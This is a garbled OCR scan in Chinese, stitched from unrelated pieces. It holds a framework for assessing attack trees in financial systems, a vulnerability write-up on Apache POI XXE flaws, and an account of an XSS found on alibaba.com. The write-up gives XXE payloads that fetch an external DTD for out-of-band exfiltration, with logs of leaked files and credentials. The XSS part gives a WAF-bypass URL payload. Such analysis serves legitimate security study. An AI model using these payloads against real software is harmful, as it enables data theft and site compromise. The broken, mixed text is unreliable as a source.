充分 识别 可 能 对 功能 点 和 信息 点 的 造成 破坏 的 场景 ; 
充分 测试 造成 被 破坏 场景 发 生 的 脆弱 性 ， 充 分 验证 可 以 利用 脆弱 性 的 威胁 和 途径 ; 
充分 识别 在 现 有 安全 措施 执行 ， 通 过 测试 手段 验证 控制 措施 的 有 效 性 ; 
， 制 定安 全 改进 措施 ， 使 系统 安全 功能 点 和 信息 点 被 人 为 破坏 的 安全 风险 可 控 。 





a ph. wn H 


2. 测 评 框架 及 要 素 
2.1. 安 全 测评 框架 


安全 测评 框架 如 下 图 所 示 : 
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公司 人 金融 /交易 和 销售 


3p od 











测试 验证 安 


BETTE sm) temm 
E 动力 号 物理 环境 


a 

鸭 集成 完成 业务 功能 点 和 信息 点 ev Reus KS pide 
©) ， 信 息 点 的 实体 是 数据 的 集合 (简称 数据 集 ) 。 业务 功能 点 在 开发 和 测试 环境 完成 逻辑 实现 
车 ， 投 入 运营 ， 实 现金 融 业 务 的 运转 。 在 IT 化 视角 则 是 代码 集 和 数据 集 的 计算 、 传 输 和 存储 。 代 码 
和 数据 集 的 计算 、 传 输 和 存储 分 别 需要 依赖 计算 资源 、 网 络 资源 和 存储 资源 ， 这 些 资源 随 着 IT 技 
术 的 不 断 演进 ， 衍 生出 了 种 类 繁多 的 IT 资源 实体 。 诸 多 IT 资源 实体 共同 构成 了 代码 集 在 开发 测试 过 
旦 实现 所 依赖 的 环境 以 及 代码 集 和 数据 集 在 生产 运营 所 依赖 的 环境 。 实 现 和 验证 所 依赖 的 IT 资源 环 
异 构成 开发 平台 和 测试 平台 ， 运 营 所 依赖 的 IT 资源 环境 则 构成 了 生产 运营 平台 。 代 码 集 、 数 据 集 以 
及 运营 所 依赖 的 IT 资源 环境 构成 了 信息 系统 。 在 开发 测试 环节 ， 代 码 集 静 态 集中 存储 所 依赖 的 IT 资 
藉 环 境 实体 的 脆弱 性 和 控制 缺陷 ， 可 能 被 人 为 威胁 利用 形成 破坏 路 径 ， 造 成 破坏 场景 (功能 自 改 、 
能 失效 、 功 能 非法 使 用 以 及 数据 算 改 、 数 据 损毁 、 数 据 泄露 发生。 在 生产 运营 环节 ， 代 码 集 、 
据 集 的 脆弱 性 和 控制 缺陷 以 及 运营 所 依赖 IT 资源 环境 实体 的 脆弱 性 及 控制 缺陷 ， 可 能 被 人 为 威胁 
用 形成 破坏 路 径 ， 造 成 破坏 场景 发 生 。 这 些 破 坏 场景 的 发 生 可 能 导致 业务 风险 事件 进而 对 业务 产 
ERA), 安全 测评 则 需要 充分 识别 、 验 证 、 分 析 破坏 场景 发 生 的 成 因 和 过 程 ， 并 评价 安全 破坏 场景 
生 的 可 能 性 ， 将 测评 成 果 提供 给 风险 管理 部 门 进行 业务 风险 分 析 和 影响 分 析 。 


.2. 安 全 测评 要 素 


安全 测评 涉及 各 要 素 之 间 的 关系 下 图 所 示 : 












































































































































Mos t ee |o TEIR 
控制 缺陷 (网 络 、 计 算 、 存 全 


通过 |] muy | sm 
人 为 威胁 — 


| i \ 存在 
A BIW (Mo M» 


fiUi PERI AE 7] 


态势 监测 能 力 
















功能 点 《代码 焦 ) 
信息 点 《数据 焦 ) 





b 
形成 
应 急 响 应 能 力 ROE fines 
ERLE OR SEN sind 
d E R A 


信息 系统 安全 


目标 


| fs 


— S wuwa 上 
造成 aad 
业务 风 哈 事件 上 » 业务 损失 - 


安全 测评 要 素 关系 图 中 ， 圆 角 方 框 代表 安全 测评 的 基本 要 素 ， 直 角 方 框 为 安全 测评 的 关联 要 素 ,， B 
个 安全 测评 围绕 着 破坏 场景 展开 。 各 要 素 之 间 关 系 说 明 如 下 : a) 人 为 威胁 通过 IT 资源 入 口 ， 接 触 
功能 点 、 信 息 点 以 及 IT 资源 环境 实体 ， b) 功能 点 、 信 息 点 以 及 !T 环 境 资源 实体 存在 脆弱 性 及 控制 缺 
陷 ; c) 人 为 威胁 利用 脆弱 性 及 控制 缺陷 形成 破坏 路 径 ; d) 破坏 路 径 造成 功能 点 与 信息 点 的 破坏 导 
致 破坏 场景 发 生 ; e) 控制 措施 可 以 减少 脆弱 性 和 IT 资 源 环 境 实 体 进行 加 固 ， 也 可 以 阻 断 威胁 ， 从 而 
阻 断 破坏 路 径 ， 以 预防 破坏 场景 的 发 生 ; f) 在 现 有 控制 措施 的 作用 下 ， 仍 然 还 会 发 生 的 破坏 场景 视 
为 剩余 破坏 场景 ， 这 些 剩余 破坏 场景 的 存在 是 由 于 当前 控制 措施 的 不 充分 导致 的 ， g) 综合 考虑 剩余 
破坏 场景 的 控制 有 效 性 ， 形 成 安全 需求 和 安全 建议 ; h 将 剩余 破坏 场景 输出 给 风险 管理 部 门 进行 业 
务 风 险 事 件 分 析 和 定 损 。 


3. 分 析 方 法 
3.1. 破 坏 场景 分 析 


本 文 以 破坏 数 分 析 案 例 说 明 破坏 场景 分 析 方 法 ， 下 图 构建 了 针对 窃取 互联 网 业务 系统 非常 简单 的 破 
坏 树 ， 该 破坏 树 显示 了 攻击 者 如 何 从 Internet， 通 过 代码 脆弱 性 以 获得 业务 系统 数据 ; 通过 破坏 数据 
库 以 获取 业务 系统 数据 。</span> 3k: ' 利 用 代码 脆弱 性 获取 数据 "不 仅 限于 SQL 注入 攻击 场景 ， 获 












战略 目标 
$555 A bax 
合 规 目标 
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3</span> 破坏 树 是 从 攻击 者 角度 构建 一 组 可 能 的 攻击 集合 ， 这 些 攻击 将 实现 树 的 根 节点 (总 体 目 
| 。 攻 击 场景 表示 集合 的 特定 成 员 。 也 就 是 说 ， 攻 击 场景 由 攻击 者 为 实现 根 目标 而 执行 的 特定 活 
(由 叶 节 点 表示 ) 组 成 。 当 然 ， 这 些 叶 级 攻击 会 产生 通 向 根 目标 的 路 径 上 的 中 间 节 点 。 注 : 中 间 
点 不 是 攻击 场景 的 一 部 分 ， 为 了 分 析 攻击 如 何 发 生 ， 需 要 在 图 形 显示 出 来 。 


ie 图 标 表示 与 节点 ， 要 达到 该 节点 ， 此 节点 下 的 分 支 必须 全 部 完成 。 一 般 情 况 下 不 考虑 
有 罗 顺序， 如果 顺序 对 于 实现 与 节点 很 重要 ， 那 么 分 支 节点 就 按照 从 左 到 右 的 步骤 顺序 排序 即 可 。 


”| 图标 表示 或 节点 ， 表 示 此 节点 下 的 分 支 只 要 有 一 个 完成 即 可 。 


,图标 表示 攻击 场景 ， 表 示 攻 击 者 可 执行 的 活动 。 
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3.2. 破坏 路 径 分 析 hi > , Um 
通过 图 3 分 析 ， 攻 击 者 实现 窃取 系统 数据 共 5 条 路 径 ， 路 径 表达 公式 如 下 : 
共计 7 条 。 


这 5 条 路 径 包括 : 





45 45 a 
Aix [22]. [42 x43 x ad x | |; j. 

el: | A4] A A 
这 5 条 路 径 包 括 : A1l x 45,Al x AG, A2 x A3 X A4 x A5, A2 X A3 x A4 


A6, A7。 : 


4. 评价 方法 


4.1. 攻 击 场景 评价 指标 
4.1.1. 攻 击 成 本 (Cost) 


攻击 者 执行 该 攻击 场景 需要 消耗 的 金钱 、 人 力 、 时 间 等 成 本 总 和 ， 攻 击 者 消耗 的 成 本 越 多 。 
表 4-1: 攻击 成 本 赋值 指标 样 例 


Rh。 赋值 指标 </span> 
需要 消耗 30 天 以 上 的 时 间 ; 

5 需要 花费 10 万 以 上 的 资金 采购 攻击 工具 或 委托 专家 级 技术 人 员 持 续 性 挖掘 目标 
的 脆弱 性 。</span> 
需要 消耗 15 天 以 上 的 时 间 ; 

4 需要 花费 5-10 万 的 资金 采购 攻击 工具 或 委托 高 级 技术 人 员 持续 性 挖掘 目标 的 脆 
弱 性 。</span> 
需要 消耗 7 天 以 上 的 时 间 ; 

3 需要 花费 2-5 万 的 资金 采购 攻击 工具 或 委托 高 级 技术 人 员 利 用 目标 的 脆弱 性 。 
</Span> 
需要 消耗 2 天 以 内 的 时 间 ; 

2 需要 花费 1-2 万 的 资金 采购 攻击 工具 或 委托 中 级 技术 人 员 利 用 目标 的 脆弱 性 。 
</Span> 

1 需要 消耗 1 天 以 内 的 时 间 ; 


需要 花费 1 万 以 内 的 资金 。</span> 
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2. 攻 击 难度 (AttackDifficulty) 
六 攻 击 场景 ， 攻 击 者 需 具备 的 技术 能 力 。 
攻击 难度 赋值 指标 样 例 


赋值 指标 </span> 


不 存在 已 知 漏洞 ， 需 要 研究 0day 漏 洞 。</span> 


存在 已 知 漏洞 ， 利 用 难度 大 ， 需 要 精通 技术 、 工 具 、 方 法 ， 并 根据 实际 需要 运 
用 已 有 的 或 创建 新 的 攻击 方法 方 能 利用 。</span> 


存在 已 知 漏洞 ， 了 解 技术 、 工 具 、 方 法 ， 在 特定 领域 内 需 创建 新 的 攻击 方法 即 
可 利用 。</span> 


存在 已 知 漏洞 ， 能 够 复制 并 使 用 现 有 的 攻击 技术 即 可 利用 。</span> 
存在 已 知 漏洞 ， 具 有 简单 的 攻击 知识 ， 无 需 经 过 专业 训练 即 可 利用 。</span> 


.1.3. 被 发 现 的 可 能 性 (Detection) 
击 者 执行 该 攻击 被 防御 者 发 现 ， 导 致 攻击 行为 被 阻 断 、 被 追踪 发 现 ， 攻 击 者 可 能 承担 法 律 风险 。 
ko: 攻击 难度 风 信 指标 样 例 


赋值 


E. 说 明 </span> 
a 攻击 行为 一 直 未 被 发 现 。 很 难 追踪 溯源 ， 不 用 承担 法 律 风险 。</span> 
| p 
2 攻击 行为 在 60 分 钟 以 后 才 被 发 现 。 追 踪 溯源 相对 较 难 ， 可 能 承担 法 律 风险 
</span> 
D. 攻击 行为 在 30-60 分 钟 内 被 发 现 并 阻 断 。 较 容易 被 抓 捕 ， 会 承担 法 律 风险 。 
] </span> 
E. 攻击 行为 在 5-10 分 钟 内 被 发 现 并 阻 断 。 容 易 被 追踪 ， 会 承担 法 律 风 险 。 
| </span> 
p. 攻击 行为 5 分 钟 以 内 就 被 防御 者 发 现 阻 断 ， 现 场 被 抓 捕 ， 会 承担 法 律 风险 。 
</Span> 
4.2. 破 坏 路 径 计算 方法 


4.2.1. 攻 击 场景 发 生 的 可 能 性 
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攻击 者 执行 该 活动 ， 攻 击 成 本 越 高 ， 攻 击 的 意愿 越 低 ， 下 图 显示 攻击 成 本 对 攻击 者 执行 


Pow " 
$ed 
x ics A 





影响 程度 。 


用 函数 Fc 表示 ， 计 算 公 式 如 下 ，， 


ee 
同 理 : 
1 
faa ad 
i. 
PRO 


</span> 另外 ， 不 同 的 类 型 的 攻击 者 发 起 动机 的 意愿 不 一 样 ， 其 中 外 包 人 员 或 临时 项 目 人 员 如 果 想 
发 起 破坏 ， 重 点 会 考虑 实施 攻击 是 否 会 被 防御 者 发 现 ， 导 致 其 承担 法 律 风险 。 计 算 方法 需 考虑 攻击 
成 本 、 攻 击 难 度 、 被 发 现 的 可 能 性 的 对 不 同类 型 的 攻击 者 影响 程度 。 


威胁 类 型 攻击 成 本 权重 KARENE 。 被 发 现 的 可 能 性 权重 
</span> </span> </span> 

组 织 型 攻击 者 /团队 0.2 0.6 0.2 

内 部 恶意 人 员 /外 包 人 员 / 临 02 02 06 

时 项 目 人 员 

一 般 攻击 者 /竞争 对 手 0.4 0.3 0.3 
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ih 权 平均 法 计算 攻击 场景 发 生 的 可 能 性 ， 计 算 公 式 为 : </span> 


* 
Pan = We X Fc + Waa X Faa + Wp X Fp“ 
或 ， 
| We Waa Wp , 
Pan = wohus tg (WetWagtWp = 12 (N = 123 n) 


, 


Sp = JLPaw,( 为 破坏 路 径 各 攻击 场景 之 乘积 ) 
表 : 破坏 路 径 发 生 可 能 性 值 





破坏 路 径 发 生 的 可 能 性 值 区 域 
| 
ET —: 
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SAR [558 I SEM ch BK MS ES AHS ES BITRE ETAT AEE. < 
首先 对 每 个 攻击 场景 进行 赋值 ， 根 据 计算 方法 计算 每 个 攻击 场景 发 生 的 可 能 性 。 | 


5. 
E * 被 发 现 的 可 能 | 攻击 场景 改 


可 能 ， 
: 从 互联 网 访问 数 
A 



















ees 
A4; 通过 E 
Ry 全 地址 ， 





BÉ 


: 弱 口 令 攻 击 ， 
A6: 通过 'TNS 

Listener 远程 数据 投 
毒 漏洞 进行 TNS $) 




















Sumt: RE 
联网 业务 系统 数据 ， 






aum ho Oo OO ao Thr 


通过 计算 结果 可 知 : 
S1、S5 发 生 的 可 能 性 为 高 ， 采 取 的 安全 措施 建议 如 下 所 示 : 
预防 性 控制 措施 : 例如 关闭 数据 库 端口 、 防 止 数据 库 弱 口令 、 修 复 SQL 注 入 漏洞 或 引入 SDL 安 全 开 


A. </span> 





借助 安全 运营 平台 加 强 检测 和 响应 ， 如 定期 基线 检查 、 漏 洞 检查 ， 确 定 监测 指标 进行 实时 监控 。 借 
助 平台 进行 实时 的 安全 分 析 ， 发 现 并 阻 断 攻击 行为 。</span> 
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B i 
: 术语 及 定义 ES. 
^t a 


系统 中 提供 给 系统 用 户 使 用 ， 且 能 独立 完成 某 个 业务 环节 中 的 事务 或 数据 的 逻辑 处 理 单元 ， 其 
实体 是 代码 集 。</span> 


q 





















$ 点 </span> 
动能 点 输入 、 处 理 、 输 出 、 传 输 、 存 储 的 数据 ， 其 物理 实体 是 数据 集 。</span> 

次 源 环 境 实体 </span> 

能 点 、 信息 点 计算 、 传 输 、 存 储 状态 所 依赖 的 IT 资源 实体 ， 包 括 有 基础 架构 软件 和 硬件 。</span> 
础 架构 软件 </span> 

行 在 物理 设备 /组 件 之 上 ， 支持 代码 集 和 数据 集 计 算 、 传 输 、 存 储 的 软件 资源 。</span> 

基础 架构 硬件 </span> 

于 支持 代码 集 和 数据 集 计算 、 传输 、 存 储 的 物理 设备 /组 件 。</span> 

为 威胁 </span> 

有 破坏 意图 和 能 力 的 人 或 组 织 。 


破坏 场景 </span> 





为 威胁 利用 脆弱 性 对 信息 系统 进行 破坏 ， 造 成 系统 功能 点 失效 、 功 能 点 非法 使 用 、 功 能 点 臭 改 或 


信息 点 损毁 、 信息 点 泄露 或 信息 点 臭 改 的 事件 ， 是 人 为 威胁 进行 破坏 的 最 终 目的 。</span> 
1 破坏 树 </span> 


为 分 析 破坏 场景 的 成 因而 建立 的 一 种 倒 树 状 的 逻辑 因果 关系 图 。 其 根 节点 是 破坏 场景 。</span> 
RUTE E</span> 

政 击 场景 的 集合 ， 由 1 个 或 多 个 攻击 场景 组 成 。</span> 

1 攻击 场景 </span> 

攻击 者 可 执行 的 活动 或 漏洞 利用 过 程 的 最 小 集合 。 





wH 
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* 
"^ * 


Apache-Poi-XXE-Analysis 
0x01 概述 


apache poi 这 个 组 件 实际 上 在 java 应 用 中 变 常 见 的 ， 这 个 组 件 主要 用 在 word 文档 或 者 ex 
件 导 入 的 业务 场景 下 使 用 。 众 所 周知 ， 这 些 文 档 实际 上 也 是 一 个 类 似 压缩 包 一 类 的 存在 ， 所 只 
就 看 看 这 个 东西 。 


0x02 漏洞 分 析 


CVE-2014-3529 





漏洞 场景 搭建 
测试 代码 


import org.apache.poi.EncryptedDocumentException; 

import org.apache.poi.openxml4j.exceptions.InvalidFormatException; 
import org.apache.poi.ss.usermodel.Sheet; 

import org.apache.poi.ss.usermodel.Workbook; 


import org.apache.poi.ss.usermodel.WorkbookFactory; 


import java.io.FileInputStream; 
import java.io.IOException; 


public class { 

public static void ma ing| | throws IOException, EncryptedDoc ument 
Workbook wb1 = eC create(new FileInputStream("t est. xlsx” ON 
Sheet sheet = wbi.getSheetAt(^); 


System.out.println(sheet.getLastRowNum()) ; 
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ym. xml e TES ”Se | 
ml version="1.0" encoding="UTF-8"?> 

ject xmins="http://maven.apache.org/POM/4.0.0" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" 
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apac 
<modelVersion>4.0.0</modelVersion> 



















» «groupId»com.apache.poic/groupId» 
- <artifactId>xxe</artifactId> 

~ <version>1.0-SNAPSHOT</version> 
«dependencies» 

«dependency» 
«groupId»org.apache.poic/groupId» 
<artifactId>poi-ooxml</artifactId> 
<version>3.10-FINAL</version> 

</dependency> 

</dependencies> 


> project> 












excel 文件 中 的 [Content_Types].xml 、 /xllworkbook.xml 、 /xl/worksheets/shee1.xml 
可 添加 xxepayload 触发 漏洞 ， 我 选择 在 [Content Types].xml 文件 中 添加 。 


E mu SOUR 


p {Content_Types].xml 1.1 KB 1 KB XML 3S 2019-12-13 10:32 


[Content Types].xml - i38 一 n x 


int : 
) XHA SRE ERO EEV) MEH) 
1 {<?xml version="1.0" encoding- "UTF-8" standalone="yes"?> 


<!DOCTYPE xmlrootname [<!ENTITY 96 aaa SYSTEM "http://127.0.0.1:8080/ext.dtd" > %aaa;%ccc 
|«Types xmins="http://schemas.openxmlformats.org/package/2006/content-types" > « Default E: 
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127.0.0.1 - - [13/Dec/2019 10:35:16] "GET /ext.dtd HTTP/1.1" 200 - 
info: FTP: recvd 'USER fakeuser' 

info: FTP: recvd ‘PASS .BBE72B41371180178E084EEAF106AED4F350939DB95p3:.... 
2E7AE82F i 
.keystone install lock 

»5.PGSQL. 5433 

.S.PGSQL.5433. lock 

adobegc. log 

ALTest1.err 

AlTest1. out 

com.apple. launchd. qeMSjMqcfb 

com. sangfor.ca.sha 

com. sangfor. lockcert 

com. sangfor. Lockecagent 

com. sogou. inputmethod 

devio semaphore devio 0xb01e 

iNode 

mounter—log. log 

power log 

sangfor.ec.rundata 

stop easyconnect.sh 

SurgeHelper. log 

vmware-link3r 

yjp201709051529.jar' 


漏洞 分 析 E 


选择 在 WorkbookFactory.create 处 下 一 个 断 点 ， 一 步 步 跟 入 ， 来 到 了 OPCPackage 这 个 类 
中 。 





OPCPackage pack = ZipPackage(in, PackageAccess.READ WRITE); 
(pack.partList == nett 
pack.getParts(); 


pack; 





在 这 个 累 里 ， 首 先 new 了 一 个 zipPackage 类 来 解析 输入 ， 跟 进来 很 明显 是 个 处 理 zip 这 类 型 压缩 
包 的 东西 。 


ZipPackage(InputStream in, PackageAccess access) IOException { 
(access); 
.zipArchive = ZipInputStreamZipEntrySource( ZipInputstream(iT 
} 


继续 往 下 走 ， 看 到 了 一 个 i 里面 调用 了 pack.getParts(); 方法 ， 跟 进 getParts 。 












pub1; gePante rows Tnvaliikb PEXCe n { 
.throwExceptionIfWriteOnly(); 
( .partList -- uet 
hasCorePropertiesPart - ; 
needCorePropertiesPart - ; 


PackagePart[] parts - .getPartsImpl(); 


里 不 知道 首 漏洞 触发 点 在 哪 ， 自 然 就 一 步 步 跟 了 ， 首 先 看 到 了 一 个 this.getPartsImpl() ， 跟 进 
名 方法， 在 这 个 方法 里 面 看 到 了 一 个 很 眼熟 的 东西 ， 我 们 刚刚 是 在 [Content_Types].xml 文件 中 
的 payload ， 这 里 出 现 了 这 个 文件 。 







[] getpartsImpt() InvalidFormatException { 
yA 
4 PackagePartCollection() 


UE 
partList.values(). toArray(new PackagePart [ 


ive, getEntries{ 


nt 


detZipArenivet Y, get LipotStéeda(entéy) xi etry (Content Types Jom 


InvalidFormatExcept ion(var8, getMessage() ) 


T 55R ZipContentTypeManager 这 个 类 ， 跟 进 之 后 才 发 现 ， 它 调用 的 是 它 的 父 类 


ContentTypeManager 来 进行 处 理 。 





© ContentTypeManager (InputStream inj ET 
this. container = pkg; 
i „ge fen M Con Sant Ly Pe = 
i} 


w InvalidFormatException( 





跟 进 parseContentTypesFile 终于 找到 了 XXE 的 触发 点 。 


T vp "XimteorcermTypetbuczge 
erator elementiteratorDefault = defaultType ;iterator(); 





15— 41-38 81x 
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parseContentTypesFile::'':;, ContentTypeManager (org.apache.poi.openxml4j.opc. 
<init>: 05, ContentTypeManager (org.apache.poi.openxml4j.opc.internal) 
<init>:>°, ZipContentTypeManager (org.apache.poi.openxml4j.opc.internal) 
getPartsImpl:.:.., ZipPackage (org.apache.poi.openxml4j.opc) 
getParts:^'^, OPCPackage (org.apache.poi.openxml4j.opc) 

open:- ^, OPCPackage (org.apache.poi.openxml4j.opc) 

create: ©, WorkbookFactory (org.apache.poi.ss.usermodel) 

main:i2?, CVE20143529 


漏洞 修复 


可 以 看 到 修复 方式 将 xmlReader.read(in) 变 成 了 SAXHelper.readSAXDocument(in) 


private void t I throws InvalidFormatEX 
tru 
Document xmlContentTypetDoc = SAXHelper.readSAXDocument (in); 


然后 在 org.apache.poi.util.SAXHelper 中 做 了 一 些 xxe 的 限制 。 


CVE-2019-12415 





漏洞 场景 搭建 
测试 代码 : 
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org apache. poi.EncryptedDocumentException; | » "^ 
| org.apache.poi.openxml4j.exceptions.InvalidFormatException; 
~ org. apache.poi.xssf.extractor.XSSFExportToXml; 
- org apache.poi.xssf.usermodel.XSSFMap; 
t org.apache.poi.xssf.usermodel.XSSFWorkbook; 











t javax.xml.transform.TransformerException; 
rt java.io.File; 


rt java.io.FileInputStream; 


C class { 
Bpüblic static void throws IOException, EncryptedDocument 
XSSFWorkbook wb = new XSSFWorkbook(new FileInputStream(new File( /users/ 


for (XSSFMap map : wb.getCustomXMLMappings()) { 
XSSFExportToXml exporter - new XSSFExportToXml(map); 
exporter.exportToXML(System.out, true); A 


.xml 
xml versionz"1.0" encoding="UTF-8"?> 
roject xmlns="http://maven.apache.org/POM/4.0.0" 
xmlns:xsiz"http://www.w3.0rg/2001/XMLSchema- instance" 
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apac 
<modelVersion>4.0.0</modelVersion> 


<groupId>com. apache. poi</groupId> 
<artifactId>xxe</artifactId> 
«version»1.0-SNAPSHOT«/version» 
«dependencies» 

«dependency» 
«groupId»org.apache.poi«/groupId» 
<artifactId>poi-ooxml</artifactId> 
<version>4.1.0</version> 

</dependency> 

</dependencies> 
</project> 
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下 载 这 个 ， 在 CustomxMLMappings/x1/xmlMaps. xml 文件 中 增加 下 面 这 个 代 祝 
«xsd:redefine schemaLocation="http://127.0.0.1:8080/"></xsd: redefine> 


Poixxe { 
EN main{Stringl) args) > on, EncryptedDocumentException X i] t Trans formerExcept fon 
)rkbook wb = SFWorkbook( e utSt F ( xlsx"))) 


ustomXMiMappings()) { 
4 X9SFExportToXmllmap) 
) y 


python -m SimpleHTTPServer 8080 (Python) 


Last login: Fri Dec 13 12:14:11 on console 

You have new mail, 

# Link3r@link3r. local: ~ 

T python -m SimpleHTTPServer 8080 

Serving HTTP on 0.0.0.0 port 8080 ... 

127.0.0.1 ~ {13/Dec/2019 14:10:51] code 404, message File not found 
127.0.0.1 ~ - [13/Dec/2019 14:10:51] "GET /ext.dtd HTTP/1.1" 404 ~ 






worksheets MERE 





sharedStrings.xm KB XML ze 
styles.xml 1 K8 1 XML xe 
workbook.xml 1 KB 1K8 XML xs 
xmlMaps.xml 1.0 KB 1KB XML 文档 





schema openxmlftormats.org/spreadsheetml/2006/main-. Selectionblamr 


sd:r red define sc hemaLocation - "http:;//127.0.0.1:8080/ext.dtd" >f] 


WN ga WY 


漏洞 分 析 


调用 栈 太 繁琐 了 ， 只 列 几 个 关键 点 ， 程 序 进行 到 XSDHandler#constructTrees 这 个 方法 的 时 候 ， 
抓 出 来 我 们 poc 中 的 外 带 地 址 。 


reset(); 
»setContextTypel reftype) ; 
(doces 


schemaSource, XsoDescription desc, 
ment) 4 


(schemaSo: eof DOMInputSource) { 
getSchemaDocument (desc. getTargetNamespace(), (DOMInputSource) schemaSource, mustResolve, desc. getContextType(), .refer£lément); 


(schemaSource f SAXInputSource) { 
getSchemaDocument (desc, getTargetNamespace(), (SAXInputSource) schemaSource, mustResolvé, desc.getContextType() ;  refer&lenent) ; 


(schemaSource * StAXInputSource) { 
getSchemaDocument (desc, getTargetNamespace(), (StAXInputSource). schemaSource, mustResolve, desc. getContextType() , .referElement); 


f XS1npotSource) { 
SchemaSource, desc); 





最 后 代码 继续 往 下 走 ， 在 XMLEntityManager#setupCurrentEntity 找到 了 http 的 请 求 发 起 ， 所 以 
想 知 道 一 个 XXE 漏 洞 的 调用 栈 ， 绝 大 多 数 情况 下 ， 你 可 以 选择 在 JDK 自 身 的 
XMLEntityManager#setupCurrentEntity 中 HTTP 请 求 下 个 断 点 ， 然 后 利用 OOB 方 式 利用 ， 很 多 
找到 触发 过 程 的 调用 栈 。 








ttpiz/127.0.0.1:8088/eXt. dtd" 





setupCurrentEntity:619, XMLEntityManager (com.sun.org.apache.xerces.internal. ime 
determineDocVersion:189, XMLVersionDetector (com.sun.org.apache.xerces.internal. 


00:00 
00:00 parse:582, SchemaParsingConfig (com.sun.org.apache.xerces.internal.impl.xs.opti) 
00:00 parse:685, SchemaParsingConfig (com.sun.org.apache.xerces.internal.impl.xs.opti) 
1733 


parse:530, SchemaDOMParser (com.sun.org.apache.xerces.internal.impl.xs.opti) 
getSchemaDocument:2175, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.t 
resolveSchema:2096, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.trave 
constructTrees:1100, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.trav 
parseSchema:620, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.traverse 
loadSchema:617, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) 
loadGrammar:575, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) 
loadGrammar:541, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) 
newSchema:255, XMLSchemaFactory (com.sun.org.apache.xerces.internal.jaxp.validat 
newSchema:638, SchemaFactory (javax.xml.validation) 

isValid:249, XSSFExportToXml (org.apache.poi.xssf.extractor) 

exportToXML:211, XSSFExportToXml (org.apache.poi.xssf.extractor) 
exportToXML:105, XSSFExportToXml (org.apache.poi.xssf.extractor) 

main:20, PoiXxe 


漏洞 修复 


修复 的 方式 增加 了 一 行 。 


trySetFeature(factory, 


isValid(Document xml) th s SAXException { 


String language = 


UMS i 
Schema schema = factory.newSchema(source) 
Validator validator = schema.newValidator(); 


validator. validate( DOMSource(xm1)); 
Fi Š 


; var7}); 
return, false; 
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然后 问题 关键 点 就 来 到 了 SecuritySupport&checkAccess ， 可 以 看 到 未 修复 人 和 
allowedProtocols 是 all， 而 acessAny 也 是 all， 所 以 checkAccess Mun 


y accessAny) throws IüException { 
lat lowedProtocotsf j 
pom 


curitySupport checkAccess0 


E Variables 


sy te PS static 


已 修复 代码 中 的 SecuritySupport#checkAccess 方法 ， 可 以 看 到 未 修复 代码 allowedProtocols 
是 "， 而 acessAny 也 是 a 纠 ， 所 以 checkAccess 结果 返回 的 是 http 。 


tu String checkAccess(String systemid, SUD allowedProtocols, String accessAny) tnraws IOException { 
(systemId == it || (atlowedProtocols & 
allowedProtocols.equalsignoreCasel ssAny))) 1 


protocol = path. subst g path, indexdf{ 


(isProtacolAllowed(protocol lowedProtocols)) { 


curitySupport ^ checkAccess() 


EB Variables 
& Y ee € static 
5 4 
@ allowedProto 


» [o accessAny = 
i # protocol 





回 到 XSDHandler#getSchemaDocument 中 ， 由 于 不 允许 http 方 式 外 带 数据 ， 因 此 我 们 的 错误 信 
息 自然 会 出 现下 图 报错 里 面 的 部 分 。 


if (referfype == xSOdescription. CONT! 
|f referType XsbDescription J f 
LIANG. AGCRSSELLOL, SEGUE GUBIUC aed seta 


(accessError 


jectll, 4 Securi schenald), accessError ), 
SOCHEAE suu | 


ext dtd 





最 后 在 简单 bb 一 下 ， 这 个 洞 没 喻 用， 外 带 也 没 办 法 利用 FTP client 换 行 那个 洞 外 带 数 据 ， 所 以 是 个 
弟 中 弟 的 洞 。 


Rerfence 
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记 一 次 阿里 主 站 xss 测 试 及 绕 过 waf 防 护 


使 用 扫描 器 xray 顺手 扫 了 下 Alibaba.com 结果 扫 出 来 个 xss 漏 洞 。 本 来 以 为 应 该 是 误 报 ， 去 
一 下 ， 还 真 的 验证 成 功 了 。 


漏洞 url: 






https://www.alibaba.com/*****?CatId=%3C/sCrIpT%3E%3Cimg%20src=1234%20%3E 


AI— 








?CatId=</sCripT><img src-1234 > 
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"on 


topicPosition""0", "topic Show" true, "virtualExposurePageld" 3281168976e41aeb2c609162140bc22", "num""0" ), "dmtrack" 4 
Jer", "dmtrack pageid""dmtrack pageid. placeholder" ), "abtest" ( 
a com/survey/KWRCnFTt", "creditLevelUr" "http //www alibaba cony”, "creditLevelDesc""CREDIT LEVEL, 





T ™ "showWholesaleModule" false, "needCompareOfferAttr" " === "true", "feedbackTheme""new. version", 
ype". "old. version", "isNewCompare" true, "isMultilmage".true, "kingUpdateSwitch" true, "magellan. list new. offer". "new. version", 
lan review new" "SbtsVersionInfoTool getBucketName(magellan. review. new, SbasicLocation toString()", "isNewFilter" false }, 


RtgForm". ©, "activityConfiq" 








tory". ("sceneld"; "IDX16JrHYWfDIDTuS54ey7 JEdWwNAilffMbGL JvB5uWtfc*" }, "sendRfq" true, "zero" 4 "keyword" "qunkit-JZpTT", 


her \u002Au002fwww alibaba com\u0d2fPet\uG02dProducts_p205816801" }, { "name". "GardenvuD020Supplies", "href" 

1N021\002fwww alibaba com\u002fGarden\ud02dSupplies_p205816901" }, ("name” "Home\u0020Textiles”, "hret" 
I002fNu002fwww alibaba com\uGO2fHome\uOO2dTextiles_p205846102" J, { "name": "Agriculture", "href" 

Wu002T\ LOO 2fwww alibaba comuDO2fAqriculture p1" ), ( "name": "Apparel", "href": "\uN02f\u002fwww alibaba comNu002f Apparel. p3" }, { "name": 
Vehicles\u0020\u0026\u0020Accessories”, "href" \u002Nu002fwww alibaba com\u002fVehicles\u02dAccessories_p34” }, {"name” 
eauty\10020\u0026\u0020Personal\u0020Care”, “href”. "\u0O2f\u002fwww.alibaba. com\uG02fBeauty\u0dZdPersonal\ud02dCare_p66" ), { 
e". "Business\uO020Services”, "href": "\UDO2/\U002fwww alibaba.com\u002fBusiness\u002dServices..p28" ), { "name": “Chemicals”, "href": 
